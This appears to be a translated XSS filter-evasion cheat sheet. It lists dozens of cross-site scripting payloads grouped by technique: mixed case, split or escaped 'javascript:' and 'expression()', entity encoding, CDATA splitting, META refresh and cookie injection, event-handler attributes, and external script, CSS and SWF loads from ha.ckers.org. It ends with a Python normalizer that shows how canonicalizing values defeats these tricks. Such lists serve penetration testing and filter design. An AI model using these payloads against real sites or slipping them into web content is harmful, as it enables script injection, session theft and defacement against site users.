1. Change the case of characters

<sCript>alert('d')</scRipT>
2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>
<SCRIPT a=">" SRC="t.js"></SCRIPT>
<SCRIPT =">" SRC="t.js"></SCRIPT>
<SCRIPT a=">" '' SRC="t.js"></SCRIPT>
<SCRIPT "a='>'" SRC="t.js"></SCRIPT>
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Replace .js with another extension

<script src="bad.jpg"></script>
4. Put JavaScript inside a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
background-image: url('javascript:alert("XSS");')
}
5. Add other characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>
<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use tab or newline to evade

<img src="jav ascr ipt:alert('XSS3')">
<img src="jav ascr ipt:alert('XSS3')">
<IMG SRC="jav ascript:alert('XSS');">

-> tab
-> new line
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>
<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">
<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
Original: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
Original: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
9. script in HTML tag

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code contained in an swf

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code and reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>
<img src="javascript:alert('XSS3')">
<IMG DYNSRC="javascript:alert('XSS20')">
<IMG LOWSRC="javascript:alert('XSS21')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">
<IFRAME SRC=javascript:alert('XSS27')></IFRAME>
<TABLE BACKGROUND="javascript:alert('XSS29')">
<DIV STYLE="background-image: url(javascript:alert('XSS30'))">
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
</STYLE><A CLASS=XSS></A>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
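As an added defensive example (not part of the original post), the Python below normalizes an extracted attribute, URL or style value before matching, which is why the tricks in items 1, 6, 7, 8 and 11 get past a plain keyword regex but not a canonicalizing check. The sample strings are constructed from the classes above, and the code assumes the value has already been pulled out of the markup by an HTML parser.

```python
import html
import re

# What a naive filter looks for: the keyword itself, case-insensitive, with no normalization.
NAIVE = re.compile(r"javascript:|expression\(", re.I)
HTML_COMMENT = re.compile(r"<!--.*?-->", re.S)
CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# A CSS backslash escape: 1-6 hex digits (optionally followed by one space) or any single char.
CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6} ?|.)", re.S)
CONTROL = re.compile(r"[\x00-\x20]")

def css_unescape(s: str) -> str:
    """Resolve CSS escapes the way a CSS parser does: \\6A -> 'j', \\s -> 's'."""
    def repl(m):
        e = m.group(1).strip()
        return chr(int(e, 16)) if re.fullmatch(r"[0-9a-fA-F]{1,6}", e) else e
    return CSS_ESCAPE.sub(repl, s)

def canonicalize(value: str) -> str:
    """Reduce an attribute, URL or style value to the form the browser will act on."""
    v = html.unescape(value)      # item 8: numeric entities such as &#x6A; or &#106;
    v = HTML_COMMENT.sub("", v)   # item 11: javas<!-- -->cript reassembled by the data island
    v = CSS_COMMENT.sub("", v)    # item 7: expr/*anyword*/ession
    v = css_unescape(v)           # item 7: expre\ssi\on, \ja\vasc\ript
    v = CONTROL.sub("", v)        # item 6: tab, newline and other control chars in the scheme
    return v.lower()              # item 1: mixed case

def naive_flags(value: str) -> bool:
    return bool(NAIVE.search(value))

def canonical_flags(value: str) -> bool:
    return bool(NAIVE.search(canonicalize(value)))

# Constructed samples mirroring the evasion classes above; inert strings, not live markup.
SAMPLES = {
    "case":    "JaVaScRiPt:alert('d')",
    "tab_nl":  "jav\tascr\nipt:alert('XSS3')",
    "css_esc": r"width: expre\ssi\on(alert('XSS31'))",
    "css_cmt": "xss:expr/*anyword*/ession(alert('sss'))",
    "entity":  "&#x6A;avascript:alert('abc')",
    "comment": "javas<!-- -->cript:alert('XSS')",
    "benign":  "https://example.com/static/app.js",
}

def audit() -> dict:
    """Map each sample name to (naive_result, canonical_result)."""
    return {k: (naive_flags(v), canonical_flags(v)) for k, v in SAMPLES.items()}
```

A production filter should allow-list URL schemes and CSS properties rather than block-list keywords, but the normalize-then-check ordering shown here is what defeats these evasions.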